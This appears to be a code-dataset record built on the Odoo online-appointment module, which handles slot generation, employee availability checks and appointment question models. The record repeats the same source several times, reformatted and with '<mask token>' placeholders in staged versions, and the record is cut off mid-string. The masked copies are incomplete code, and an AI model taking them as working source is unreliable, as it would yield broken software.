('partner_ids.user_ids', '=', emp.user_id.id),
('start', '<', fields.Datetime.to_string(
last_day.replace(hour=23, minute=59, second=59)
)), ('stop', '>', fields.Datetime.to_string(
first_day.replace(hour=0, minute=0, second=0)))])
if is_calendar_available(slot, meetings[emp_pos], emp):
slot['employee_id'] = emp
break
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
days=self.max_schedule_days))
slots = self._slots_generate(first_day.astimezone(appt_tz),
last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC),
last_day.astimezone(pytz.UTC), employee)
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
while slots and slots[0][timezone][0].date() <= day:
if slots[0][timezone][0].date(
) == day and 'employee_id' in slots[0]:
today_slots.append({'employee_id': slots[0]
['employee_id'].id, 'datetime': slots[0
][timezone][0].strftime(
'%Y-%m-%d %H:%M:%S'), 'hours': slots[0]
[timezone][0].strftime('%H:%M')})
slots.pop(0)
dates[week_index][day_index] = {'day': day, 'slots':
today_slots, 'mute_cls': mute_cls, 'weekend_cls':
weekend_cls, 'today_cls': today_cls}
months.append({'month': format_datetime(start, 'MMMM Y', locale
=get_lang(self.env).code), 'weeks': dates})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = 'calendar.appointment.slot'
_description = 'Online Appointment : Time Slot'
_rec_name = 'weekday'
_order = 'weekday, hour'
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',
'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),
('7', 'Sunday')], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import calendar as cal
import random
import pytz
from datetime import datetime, timedelta, time
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from babel.dates import format_datetime
from odoo import api, fields, models, _
from odoo.tools.misc import get_lang
from odoo.addons.base.models.res_partner import _tz_get
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import ValidationError
class CalendarAppointmentType(models.Model):
_name = "calendar.appointment.type"
_description = "Online Appointment Type"
_inherit = ['mail.thread', "website.seo.metadata", 'website.published.mixin']
_order = "sequence"
sequence = fields.Integer('Sequence')
name = fields.Char('Appointment Type', required=True, translate=True)
min_schedule_hours = fields.Float('Schedule before (hours)', required=True, default=1.0)
max_schedule_days = fields.Integer('Schedule not after (days)', required=True, default=15)
min_cancellation_hours = fields.Float('Cancel Before (hours)', required=True, default=1.0)
appointment_duration = fields.Float('Appointment Duration', required=True, default=1.0)
reminder_ids = fields.Many2many('calendar.alarm', string="Reminders")
location = fields.Char('Location', help="Location of the appointments")
message_confirmation = fields.Html('Confirmation Message', translate=True)
message_intro = fields.Html('Introduction Message', translate=True)
country_ids = fields.Many2many(
'res.country', 'website_calendar_type_country_rel', string='Restrict Countries',
help="Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries")
question_ids = fields.One2many('calendar.appointment.question', 'appointment_type_id', string='Questions', copy=True)
slot_ids = fields.One2many('calendar.appointment.slot', 'appointment_type_id', 'Availabilities', copy=True)
appointment_tz = fields.Selection(
_tz_get, string='Timezone', required=True, default=lambda self: self.env.user.tz,
help="Timezone where appointment take place")
employee_ids = fields.Many2many('hr.employee', 'website_calendar_type_employee_rel', domain=[('user_id', '!=', False)], string='Employees')
assignation_method = fields.Selection([
('random', 'Random'),
('chosen', 'Chosen by the Customer')], string='Assignment Method', default='random',
help="How employees will be assigned to meetings customers book on your website.")
appointment_count = fields.Integer('# Appointments', compute='_compute_appointment_count')
def _compute_appointment_count(self):
meeting_data = self.env['calendar.event'].read_group([('appointment_type_id', 'in', self.ids)], ['appointment_type_id'], ['appointment_type_id'])
mapped_data = {m['appointment_type_id'][0]: m['appointment_type_id_count'] for m in meeting_data}
for appointment_type in self:
appointment_type.appointment_count = mapped_data.get(appointment_type.id, 0)
def _compute_website_url(self):
super(CalendarAppointmentType, self)._compute_website_url()
for appointment_type in self:
if appointment_type.id :
appointment_type.website_url = '/calendar/%s/appointment' % (slug(appointment_type),)
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
default = default or {}
default['name'] = self.name + _(' (copy)')
return super(CalendarAppointmentType, self).copy(default=default)
def action_calendar_meetings(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("calendar.action_calendar_event")
action['context'] = {
'default_appointment_type_id': self.id,
'search_default_appointment_type_id': self.id
}
return action
# --------------------------------------
# Slots Generation
# --------------------------------------
def _slots_generate(self, first_day, last_day, timezone):
""" Generate all appointment slots (in naive UTC, appointment timezone, and given (visitors) timezone)
between first_day and last_day (datetimes in appointment timezone)
:return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},
... ]
"""
def append_slot(day, slot):
local_start = appt_tz.localize(datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))))
local_end = appt_tz.localize(
datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))) + relativedelta(hours=self.appointment_duration))
slots.append({
self.appointment_tz: (
local_start,
local_end,
),
timezone: (
local_start.astimezone(requested_tz),
local_end.astimezone(requested_tz),
),
'UTC': (
local_start.astimezone(pytz.UTC).replace(tzinfo=None),
local_end.astimezone(pytz.UTC).replace(tzinfo=None),
),
'slot': slot,
})
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
slots = []
for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == first_day.isoweekday()):
if slot.hour > first_day.hour + first_day.minute / 60.0:
append_slot(first_day.date(), slot)
slot_weekday = [int(weekday) - 1 for weekday in self.slot_ids.mapped('weekday')]
for day in rrule.rrule(rrule.DAILY,
dtstart=first_day.date() + timedelta(days=1),
until=last_day.date(),
byweekday=slot_weekday):
for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == day.isoweekday()):
append_slot(day, slot)
return slots
def _slots_available(self, slots, first_day, last_day, employee=None):
""" Fills the slot stucture with an available employee
:param slots: slots structure generated by _slots_generate
:param first_day: start datetime in UTC
:param last_day: end datetime in UTC
:param employee: if set, only consider this employee
if not set, consider all employees assigned to this appointment type
"""
def is_work_available(start_dt, end_dt, intervals):
""" check if the slot is contained in the employee's work hours (defined by intervals)
"""
def find_start_index():
""" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt
"""
def recursive_find_index(lower_bound, upper_bound):
if upper_bound - lower_bound <= 1:
if intervals[upper_bound][0] <= start_dt:
return upper_bound
return lower_bound
index = (upper_bound + lower_bound) // 2
if intervals[index][0] <= start_dt:
return recursive_find_index(index, upper_bound)
else:
return recursive_find_index(lower_bound, index)
if start_dt <= intervals[0][0] - tolerance:
return -1
if end_dt >= intervals[-1][1] + tolerance:
return -1
return recursive_find_index(0, len(intervals) - 1)
if not intervals:
return False
tolerance = timedelta(minutes=1)
start_index = find_start_index()
if start_index != -1:
for index in range(start_index, len(intervals)):
if intervals[index][1] >= end_dt - tolerance:
return True
if len(intervals) == index + 1 or intervals[index + 1][0] - intervals[index][1] > tolerance:
return False
return False
def is_calendar_available(slot, events, employee):
""" Returns True if the given slot doesn't collide with given events for the employee
"""
start_dt = slot['UTC'][0]
end_dt = slot['UTC'][1]
event_in_scope = lambda ev: (
fields.Date.to_date(ev.start) <= fields.Date.to_date(end_dt)
and fields.Date.to_date(ev.stop) >= fields.Date.to_date(start_dt)
)
for ev in events.filtered(event_in_scope):
if ev.allday:
# allday events are considered to take the whole day in the related employee's timezone
event_tz = pytz.timezone(ev.event_tz or employee.user_id.tz or self.env.user.tz or slot['slot'].appointment_type_id.appointment_tz or 'UTC')
ev_start_dt = datetime.combine(fields.Date.from_string(ev.start_date), time.min)
ev_stop_dt = datetime.combine(fields.Date.from_string(ev.stop_date), time.max)
ev_start_dt = event_tz.localize(ev_start_dt).astimezone(pytz.UTC).replace(tzinfo=None)
ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz.UTC).replace(tzinfo=None)
if ev_start_dt < end_dt and ev_stop_dt > start_dt:
return False
elif fields.Datetime.to_datetime(ev.start) < end_dt and fields.Datetime.to_datetime(ev.stop) > start_dt:
return False
return True
workhours = {}
meetings = {}
# With context will be used in resource.calendar to force the referential user
# for work interval computing to the *user linked to the employee*
available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in (employee or self.employee_ids)]
random.shuffle(available_employees)
for slot in slots:
for emp_pos, emp in enumerate(available_employees):
if emp_pos not in workhours:
workhours[emp_pos] = [
(interval[0].astimezone(pytz.UTC).replace(tzinfo=None),
interval[1].astimezone(pytz.UTC).replace(tzinfo=None))
for interval in emp.resource_calendar_id._work_intervals_batch(
first_day, last_day, resources=emp.resource_id,
)[emp.resource_id.id]
]
if is_work_available(slot['UTC'][0], slot['UTC'][1], workhours[emp_pos]):
if emp_pos not in meetings:
# note: no check is made on the attendee's status (accepted/declined/...)
meetings[emp_pos] = self.env['calendar.event'].search([
('partner_ids.user_ids', '=', emp.user_id.id),
('start', '<', fields.Datetime.to_string(last_day.replace(hour=23, minute=59, second=59))),
('stop', '>', fields.Datetime.to_string(first_day.replace(hour=0, minute=0, second=0)))
])
if is_calendar_available(slot, meetings[emp_pos], emp):
slot['employee_id'] = emp
break
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(days=self.max_schedule_days))
# Compute available slots (ordered)
slots = self._slots_generate(first_day.astimezone(appt_tz), last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC), last_day.astimezone(pytz.UTC), employee)
# Compute calendar rendering and inject available slots
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
# slots are ordered, so check all unprocessed slots from until > day
while slots and (slots[0][timezone][0].date() <= day):
if (slots[0][timezone][0].date() == day) and ('employee_id' in slots[0]):
today_slots.append({
'employee_id': slots[0]['employee_id'].id,
'datetime': slots[0][timezone][0].strftime('%Y-%m-%d %H:%M:%S'),
'hours': slots[0][timezone][0].strftime('%H:%M')
})
slots.pop(0)
dates[week_index][day_index] = {
'day': day,
'slots': today_slots,
'mute_cls': mute_cls,
'weekend_cls': weekend_cls,
'today_cls': today_cls
}
months.append({
'month': format_datetime(start, 'MMMM Y', locale=get_lang(self.env).code),
'weeks': dates
})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = "calendar.appointment.slot"
_description = "Online Appointment : Time Slot"
_rec_name = "weekday"
_order = "weekday, hour"
appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete='cascade')
weekday = fields.Selection([
('1', 'Monday'),
('2', 'Tuesday'),
('3', 'Wednesday'),
('4', 'Thursday'),
('5', 'Friday'),
('6', 'Saturday'),
('7', 'Sunday'),
], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.00 or slot.hour >= 24.00 for slot in self):
raise ValidationError(_("Please enter a valid hour between 0:00 and 24:00 for your slots."))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, "%s, %02d:%02d" % (weekdays.get(slot.weekday), int(slot.hour), int(round((slot.hour % 1) * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = "calendar.appointment.question"
_description = "Online Appointment : Questions"
_order = "sequence"
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete="cascade")
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([
('char', 'Single line text'),
('text', 'Multi-line text'),
('select', 'Dropdown (one answer)'),
('radio', 'Radio (one answer)'),
('checkbox', 'Checkboxes (multiple answers)')], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer', 'calendar_appointment_question_answer_rel', 'question_id', 'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
    """Predefined answer that appointment questions can offer as a choice."""
    _name = "calendar.appointment.answer"
    _description = "Online Appointment : Answers"

    # NOTE(review): despite the singular '_id' suffix this is a Many2many
    # (the inverse side of calendar.appointment.question.answer_ids); the name
    # is kept as-is since views/records elsewhere may reference it.
    question_id = fields.Many2many(
        'calendar.appointment.question',
        relation='calendar_appointment_question_answer_rel',
        column1='answer_id',
        column2='question_id',
        string='Questions',
    )
    name = fields.Char(string='Answer', translate=True, required=True)
|
flexible
|
{
"blob_id": "e03dfa0e02313c5478d4e97dcaf3bc27915bd878",
"index": 1421,
"step-1": "<mask token>\n\n\nclass CalendarAppointmentSlot(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-2": "<mask token>\n\n\nclass CalendarAppointmentType(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n days=self.max_schedule_days))\n slots = self._slots_generate(first_day.astimezone(appt_tz),\n last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC),\n last_day.astimezone(pytz.UTC), employee)\n today = requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and 
day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n while slots and slots[0][timezone][0].date() <= day:\n if slots[0][timezone][0].date(\n ) == day and 'employee_id' in slots[0]:\n today_slots.append({'employee_id': slots[0]\n ['employee_id'].id, 'datetime': slots[0\n ][timezone][0].strftime(\n '%Y-%m-%d %H:%M:%S'), 'hours': slots[0]\n [timezone][0].strftime('%H:%M')})\n slots.pop(0)\n dates[week_index][day_index] = {'day': day, 'slots':\n today_slots, 'mute_cls': mute_cls, 'weekend_cls':\n weekend_cls, 'today_cls': today_cls}\n months.append({'month': format_datetime(start, 'MMMM Y', locale\n =get_lang(self.env).code), 'weeks': dates})\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = 'calendar.appointment.slot'\n _description = 'Online Appointment : Time Slot'\n _rec_name = 'weekday'\n _order = 'weekday, hour'\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',\n 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),\n ('7', 'Sunday')], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n 
appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-3": "<mask token>\n\n\nclass CalendarAppointmentType(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _compute_website_url(self):\n super(CalendarAppointmentType, self)._compute_website_url()\n for appointment_type in self:\n if appointment_type.id:\n appointment_type.website_url = '/calendar/%s/appointment' % (\n slug(appointment_type),)\n <mask token>\n\n def action_calendar_meetings(self):\n self.ensure_one()\n action = self.env['ir.actions.actions']._for_xml_id(\n 'calendar.action_calendar_event')\n action['context'] = {'default_appointment_type_id': self.id,\n 'search_default_appointment_type_id': self.id}\n return action\n <mask token>\n <mask token>\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n days=self.max_schedule_days))\n slots = self._slots_generate(first_day.astimezone(appt_tz),\n last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC),\n last_day.astimezone(pytz.UTC), employee)\n today = 
requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n while slots and slots[0][timezone][0].date() <= day:\n if slots[0][timezone][0].date(\n ) == day and 'employee_id' in slots[0]:\n today_slots.append({'employee_id': slots[0]\n ['employee_id'].id, 'datetime': slots[0\n ][timezone][0].strftime(\n '%Y-%m-%d %H:%M:%S'), 'hours': slots[0]\n [timezone][0].strftime('%H:%M')})\n slots.pop(0)\n dates[week_index][day_index] = {'day': day, 'slots':\n today_slots, 'mute_cls': mute_cls, 'weekend_cls':\n weekend_cls, 'today_cls': today_cls}\n months.append({'month': format_datetime(start, 'MMMM Y', locale\n =get_lang(self.env).code), 'weeks': dates})\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = 'calendar.appointment.slot'\n _description = 'Online Appointment : Time Slot'\n _rec_name = 'weekday'\n _order = 'weekday, hour'\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',\n 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),\n ('7', 'Sunday')], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 
'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-4": "import calendar as cal\nimport random\nimport pytz\nfrom datetime import datetime, timedelta, time\nfrom dateutil import rrule\nfrom dateutil.relativedelta import relativedelta\nfrom babel.dates import format_datetime\nfrom odoo import api, fields, models, _\nfrom odoo.tools.misc import get_lang\nfrom odoo.addons.base.models.res_partner import _tz_get\nfrom odoo.addons.http_routing.models.ir_http import slug\nfrom odoo.exceptions import ValidationError\n\n\nclass CalendarAppointmentType(models.Model):\n _name = 'calendar.appointment.type'\n _description = 'Online Appointment Type'\n _inherit = ['mail.thread', 'website.seo.metadata',\n 'website.published.mixin']\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n name = fields.Char('Appointment Type', required=True, translate=True)\n min_schedule_hours = fields.Float('Schedule before (hours)', required=\n True, default=1.0)\n max_schedule_days = fields.Integer('Schedule not after (days)',\n required=True, default=15)\n min_cancellation_hours = fields.Float('Cancel Before (hours)', required\n =True, default=1.0)\n appointment_duration = fields.Float('Appointment Duration', required=\n True, default=1.0)\n reminder_ids = fields.Many2many('calendar.alarm', string='Reminders')\n location = fields.Char('Location', help='Location of the appointments')\n message_confirmation = fields.Html('Confirmation Message', translate=True)\n message_intro = fields.Html('Introduction Message', translate=True)\n country_ids = fields.Many2many('res.country',\n 'website_calendar_type_country_rel', string='Restrict Countries',\n help=\n 'Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries'\n )\n question_ids = fields.One2many('calendar.appointment.question',\n 'appointment_type_id', string='Questions', copy=True)\n slot_ids = fields.One2many('calendar.appointment.slot',\n 'appointment_type_id', 'Availabilities', copy=True)\n appointment_tz = 
